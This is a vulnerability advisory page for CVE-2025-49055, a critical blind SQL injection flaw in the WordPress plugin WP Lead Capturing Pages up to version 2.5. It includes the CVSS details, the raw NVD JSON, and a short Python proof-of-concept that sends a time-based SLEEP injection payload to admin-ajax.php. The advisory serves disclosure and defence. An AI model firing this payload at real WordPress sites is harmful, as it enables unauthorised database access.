Security Vulnerability Report
中文
CVE-2025-49055 CVSS 9.3 CRITICAL

CVE-2025-49055

Published: 2026-01-22 17:15:56
Last Modified: 2026-04-27 20:16:10

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection.This issue affects WP Lead Capturing Pages: from n/a through <= 2.5.

CVSS Details

CVSS Score
9.3
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

wp-lead-capture <= 2.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys target = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com' # SQL injection payload for time-based blind SQLi payload = "' AND (SELECT * FROM (SELECT(SLEEP(5)))a) AND '1'='1" response = requests.get(f'{target}/wp-admin/admin-ajax.php', params={ 'action': 'lead_capture_submit', 'name': payload, 'email': '[email protected]' }) if response.elapsed.total_seconds() > 5: print('Vulnerability confirmed: SQL injection successful') else: print('Target may not be vulnerable')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49055", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:55.903", "lastModified": "2026-04-27T20:16:10.463", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in kamleshyadav WP Lead Capturing Pages wp-lead-capture allows Blind SQL Injection.This issue affects WP Lead Capturing Pages: from n/a through <= 2.5."}, {"lang": "es", "value": "Neutralización incorrecta de elementos especiales utilizados en un comando SQL ('Inyección SQL') vulnerabilidad en kamleshyadav WP Lead Capturing Pages wp-lead-capture permite Inyección SQL Ciega. Este problema afecta a WP Lead Capturing Pages: desde n/a hasta &lt;= 2.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-lead-capture/vulnerability/wordpress-wp-lead-capturing-pages-plugin-2-5-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}